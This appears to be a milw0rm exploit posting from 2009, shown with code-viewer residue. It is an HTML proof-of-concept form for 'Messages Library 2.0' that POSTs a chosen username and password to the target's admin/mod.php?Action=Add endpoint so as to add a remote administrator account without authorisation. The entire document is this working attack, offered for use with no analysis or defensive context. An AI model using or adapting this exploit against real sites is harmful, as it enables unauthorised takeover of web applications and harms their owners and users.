22 lines
No EOL
856 B
HTML
22 lines
No EOL
856 B
HTML
<head>
|
|
<title>ThE g0bL!N Messages Library 2.0 Remote Add Admintsrator Account </title>
|
|
<base target="left">
|
|
<link rel="stylesheet" href="style.css">
|
|
</head>
|
|
<form method="POST" action="http://path/sms/admin/mod.php?Action=Add">
|
|
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
|
<tr>
|
|
<td width="25%"><font face="MS Sans Serif" size="2">Username</font></td>
|
|
<td width="75%"> <input type="text" name="Name" size="57"></td>
|
|
</tr>
|
|
<tr>
|
|
<td width="25%"><font face="MS Sans Serif" size="2">Password</font></td>
|
|
<td width="75%"> <input type="password" name="Password" size="57"></td>
|
|
</tr>
|
|
</table>
|
|
<p align="center"><input type="submit" value="add admin" name="B1"></p>
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2009-06-30] |